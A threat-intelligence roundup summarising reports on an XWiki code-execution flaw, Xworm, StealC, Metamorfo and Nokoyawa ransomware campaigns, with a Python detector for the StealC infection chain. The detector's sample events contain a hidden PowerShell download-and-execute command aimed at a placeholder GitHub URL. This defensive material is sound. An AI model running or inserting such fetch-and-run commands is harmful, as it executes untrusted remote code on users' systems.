
Threat Intel Roundup: XWiki, cl0p, HTML Smuggling

XWiki Remote Code Execution (CVE-2023-35150)

The XWiki vulnerability (CVE-2023-35150) involves improper input validation within the “Invitation Application.” Authenticated attackers can exploit this flaw by manipulating requests, leading to arbitrary code execution. XWiki’s scripting feature, used to create web applications, includes an “Invitation Application” that sends email notifications for user registration. The vulnerability arises because unvalidated user data is used to render a link built from the unsanitized request URI. Successful exploitation allows an attacker to execute arbitrary code.

Malware Analysis and Dynamic Extraction of Xworm Payload

In this analysis, a Golang file is examined and an Xworm payload is extracted from it dynamically. Techniques such as Procmon, Process Hacker, entropy analysis, and debuggers are used. The 1.5GB Golang file is debloated with the “pe-debloat” tool, reducing its size to 960KB. Process monitoring reveals the malware’s activities, including scheduled tasks, library loading, and code execution. The loaded .NET assemblies are scrutinized using dnSpy, revealing capabilities such as keylogging and system enumeration. Decoding the encrypted configuration yields insight into the Xworm malware’s intent.

Threat Analysis Report – StealC Malware Campaign via “Request Booking” Spam Email

This report delves into a malware campaign using “Request Booking” spam emails to spread the StealC malware. It covers the payload, URLs, and C2 server. The spam email prompts victims to download a password-protected ZIP file containing a malicious .cmd script. Upon execution, the script downloads a PowerShell script from GitHub, initiating malware infection. The report details the infection chain and offers detection guidance for the campaign’s artifacts.
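The infection chain summarized above (a .cmd script launched from the ZIP, which in turn runs PowerShell to fetch a script from GitHub) can be matched as a parent/child process pattern. The detector below is an added example, not the report’s own detection guidance; it assumes Sysmon-style process-creation fields and uses constructed sample events with a placeholder GitHub URL.

```python
import re

# Constructed process-creation events (Sysmon-style fields); not taken from the report.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 512, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\Request_Booking\booking.cmd"'},
    {"pid": 640, "ppid": 512,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # PLACEHOLDER-ACCOUNT/PLACEHOLDER-REPO is a constructed stand-in, not a real repository.
     "cmdline": "powershell.exe -w hidden -c \"iwr https://raw.githubusercontent.com/"
                "PLACEHOLDER-ACCOUNT/PLACEHOLDER-REPO/main/stage.ps1 | iex\""},
    # Benign admin script: PowerShell under explorer.exe with no GitHub download.
    {"pid": 700, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

# Parent must be cmd.exe running a .cmd script (the ZIP's dropped batch file).
CMD_SCRIPT_RE = re.compile(r"\.cmd\b", re.IGNORECASE)
# Child PowerShell must reference GitHub and a download/execute primitive.
GITHUB_RE = re.compile(r"https?://(raw\.githubusercontent\.com|github\.com)/", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b)",
    re.IGNORECASE,
)


def find_stealc_chain(events):
    """Return (cmd_pid, powershell_pid) pairs where a .cmd-launched cmd.exe spawns
    a PowerShell process that pulls content from GitHub."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        if not (GITHUB_RE.search(e["cmdline"]) and DOWNLOAD_RE.search(e["cmdline"])):
            continue
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower().endswith("cmd.exe") \
                and CMD_SCRIPT_RE.search(parent["cmdline"]):
            hits.append((parent["pid"], e["pid"]))
    return hits


if __name__ == "__main__":
    print(find_stealc_chain(SAMPLE_EVENTS))  # [(512, 640)]
```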

Threat Analysis Report – Metamorfo (Casbaneiro) Campaign Targeting Mexico

This analysis focuses on a Metamorfo (Casbaneiro) campaign targeting Mexico. It outlines the attack’s execution chain, from phishing to payload execution. Victims are lured to a URL that delivers a .rar file and a series of scripts. AutoIt and other techniques are used for persistence, eventually leading to the execution of the Metamorfo DLLs. The report provides insights into the attacker’s tactics and detection suggestions.

Incident Analysis Report – Nokoyawa Ransomware Campaign with HTML Smuggling and Rapid Execution

This incident analysis report examines a Nokoyawa ransomware campaign that used HTML smuggling for initial access and ended in domain-wide ransomware deployment. The attack chain involves an Excel macro and IcedID malware, with Nokoyawa ransomware executed within 12 hours of initial compromise. The report details the intrusion timeline, attacker actions, lateral movement, and the ransomware’s execution. The rapid progression from compromise to ransomware highlights the threat’s sophistication.
